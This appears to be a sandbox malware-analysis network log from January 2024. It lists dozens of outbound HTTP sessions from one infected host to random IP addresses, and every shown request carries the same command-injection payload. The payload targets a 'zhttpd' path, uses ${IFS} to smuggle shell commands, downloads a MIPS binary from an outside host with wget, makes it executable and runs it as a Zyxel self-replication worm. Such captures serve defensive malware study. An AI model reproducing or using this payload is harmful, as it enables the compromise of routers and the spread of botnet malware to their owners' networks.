                                    Jan 13, 2024 19:02:47.486506939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7761192.168.2.1348270139.204.16.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486542940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7762192.168.2.1355660165.121.87.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486613035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7763192.168.2.1346322212.17.109.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486660004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7764192.168.2.134331268.210.253.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486702919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7765192.168.2.1342224120.31.116.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486747026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7766192.168.2.1346036159.103.65.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486814022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7767192.168.2.135468282.33.148.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486855030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7768192.168.2.1360354120.110.211.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486901045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7769192.168.2.135636482.221.159.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486970901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7770192.168.2.1340174105.121.54.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486988068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7771192.168.2.1344682125.14.87.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487044096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7772192.168.2.136096823.91.89.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487107038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7773192.168.2.1356016146.228.113.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487149000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7774192.168.2.1348784180.116.133.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487191916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7775192.168.2.1336112203.41.106.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487270117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7776192.168.2.1345368203.17.103.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487320900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7777192.168.2.133731637.217.160.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487356901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7778192.168.2.1338492220.184.183.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487401962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7779192.168.2.1358216165.158.35.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487467051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7780192.168.2.1342512157.197.198.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487543106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7781192.168.2.1343548125.188.130.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487550020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7782192.168.2.1340392112.111.62.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487595081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7783192.168.2.1339042209.239.180.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487633944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7784192.168.2.1343386167.123.0.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487685919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7785192.168.2.1333544166.22.36.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487735033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7786192.168.2.1350078131.251.98.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487785101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7787192.168.2.1357264154.40.124.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487843037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7788192.168.2.1350168181.152.73.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.487912893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7789192.168.2.1336242162.141.141.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488012075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7790192.168.2.134204072.89.94.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488018036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7791192.168.2.1356020199.246.15.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488053083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7792192.168.2.1358014108.105.192.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488090038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7793192.168.2.134578896.252.220.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488138914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7794192.168.2.1335810151.125.152.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488203049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7795192.168.2.13602562.118.58.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488246918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7796192.168.2.13505045.241.152.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488297939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7797192.168.2.1340076202.129.225.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488358021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7798192.168.2.1356854169.12.110.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488377094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7799192.168.2.1360792104.120.20.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488451004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7800192.168.2.134415067.198.154.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488476992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7801192.168.2.133962644.233.130.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488523960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7802192.168.2.1359744219.231.85.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488591909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7803192.168.2.1332990172.153.232.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488615990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7804192.168.2.134079023.244.47.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488682032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7805192.168.2.135173878.45.157.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488744020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7806192.168.2.1334368119.75.77.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488775015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7807192.168.2.134630439.6.29.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488828897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7808192.168.2.133867850.232.171.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488877058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7809192.168.2.133910424.117.29.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.488945007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7810192.168.2.133313082.5.125.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489001036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7811192.168.2.1340952189.138.15.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489059925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7812192.168.2.134365688.150.157.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489120960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7813192.168.2.1346282106.209.55.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489166021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7814192.168.2.134686291.211.0.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489211082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7815192.168.2.1356058120.68.187.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489238024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7816192.168.2.1338020106.165.19.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489293098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7817192.168.2.13441784.85.255.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489342928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7818192.168.2.1360580143.145.154.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489397049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7819192.168.2.136012469.132.104.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489459991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7820192.168.2.1333444212.165.49.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489487886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7821192.168.2.1345940199.108.190.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489545107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7822192.168.2.1356948100.208.112.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489594936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7823192.168.2.1345242196.214.59.44443
                                    TimestampBytes transferredDirectionData
